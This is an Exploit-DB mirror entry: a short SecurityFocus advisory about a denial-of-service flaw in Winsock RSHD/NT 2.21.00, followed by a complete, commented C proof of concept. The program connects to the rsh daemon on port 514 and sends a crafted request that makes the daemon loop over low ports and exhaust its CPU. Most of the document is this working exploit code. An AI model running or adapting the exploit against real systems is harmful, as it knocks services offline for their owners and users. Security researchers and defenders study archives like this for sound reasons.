exploit-db-mirror/exploits/windows/dos/21175.c

// source: https://www.securityfocus.com/bid/3659/info
Winsock RSHD/NT is a Remote Shell Daemon for Windows NT and Windows 2000. It uses the standard Unix rsh and rcp commands. rsh (i.e. "remote shell") allows the execution of a non-interactive program on another system running the server component, 'rshd'. The daemon listens for connections coming from an rsh command over TCP/IP and, on receiving a connection, validates access and executes the specified program.
Upon connecting to the daemon, rsh supplies a port number to which the daemon should send standard error data. If the port number specified is invalid, Winsock RSHD/NT will attempt to connect to the invalid port and to all port numbers below 1024 (including negative port numbers), potentially consuming CPU resources and leading to a denial of service.
/*
** WRSHDNT 2.21.00 CPU overusage demo
** jimmers@yandex.ru
*/
#define HOST "localhost"   /* host running the rsh daemon under test */
#define PORT 514           /* standard rsh ("shell") TCP port */
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
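/*
 * Send one NUL-terminated field of the rsh request and report the result.
 *
 * The byte count includes the terminating NUL (the original demo sent
 * strlen()+1 bytes per field); a short pause precedes each send, also kept
 * from the original.
 *
 * s      connected socket
 * label  field name, used only in the printed messages
 * str    field contents
 *
 * Returns 0 on success, -1 when send() reports SOCKET_ERROR (the Winsock
 * error code has already been printed).
 */
static int send_cstr(SOCKET s, const char *label, const char *str)
{
    int res;

    Sleep(400);
    res = send(s, str, (int)strlen(str) + 1, 0); /* +1: include the NUL */
    if (res == SOCKET_ERROR) {
        res = WSAGetLastError();
        printf("send(%s) failed, WSAGetLastError: %d\n", label, res);
        return -1;
    }
    printf("send(%s): %d\n", label, res);
    return 0;
}

/*
 * Connect to the rsh daemon on HOST:PORT and send the four fields of an rsh
 * request (stderr port, local user, remote user, command), exactly as the
 * original demo does. Each step that can fail prints the Winsock error code
 * and exits with status 1; every exit path closes the socket and releases
 * Winsock, which the original omitted on the send-failure paths.
 *
 * Command-line arguments are not used.
 *
 * Returns 0 when all four fields were sent, 1 on any failure.
 */
int main(int argc, char *argv[])
{
    SOCKET s = INVALID_SOCKET;
    WSADATA wsaData;
    LPHOSTENT lpHostEnt;
    SOCKADDR_IN sockAddr;
    int res;
    int rc = 1;
    const char *stderr_port = "1024";
    const char *local_user = "Administrator";
    const char *remote_user = "root";
    const char *cmd = "ver";

    (void)argc;
    (void)argv;

    res = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (res != 0) {
        /* WSAStartup() returns the error code directly; WSAGetLastError()
           is not meaningful before a successful startup, so print what it
           returned. Nothing to clean up yet. */
        printf("WSAStartup() failed, WSAGetLastError: %d\n", res);
        return 1;
    }

    lpHostEnt = gethostbyname(HOST);
    if (lpHostEnt == NULL || lpHostEnt->h_addr_list[0] == NULL) {
        res = WSAGetLastError();
        printf("gethostbyname() failed, WSAGetLastError: %d\n", res);
        goto cleanup;
    }

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) {
        res = WSAGetLastError();
        printf("socket() failed, WSAGetLastError: %d\n", res);
        goto cleanup;
    }

    /* Zero the whole address so sin_zero does not carry stack garbage. */
    memset(&sockAddr, 0, sizeof sockAddr);
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port = htons(PORT);
    /* Copy the first resolved address out of the hostent rather than
       casting through the list pointer as the original did. */
    memcpy(&sockAddr.sin_addr, lpHostEnt->h_addr_list[0],
           sizeof sockAddr.sin_addr);

    res = connect(s, (PSOCKADDR)&sockAddr, (int)sizeof sockAddr);
    if (res != 0) {
        res = WSAGetLastError();
        printf("connect() failed, WSAGetLastError: %d\n", res);
        goto cleanup;
    }

    if (send_cstr(s, "stderr_port", stderr_port) != 0) {
        goto cleanup;
    }
    if (send_cstr(s, "local_user", local_user) != 0) {
        goto cleanup;
    }
    if (send_cstr(s, "remote_user", remote_user) != 0) {
        goto cleanup;
    }
    if (send_cstr(s, "cmd", cmd) != 0) {
        goto cleanup;
    }

    rc = 0;

cleanup:
    if (s != INVALID_SOCKET) {
        closesocket(s);
    }
    WSACleanup();
    return rc;
}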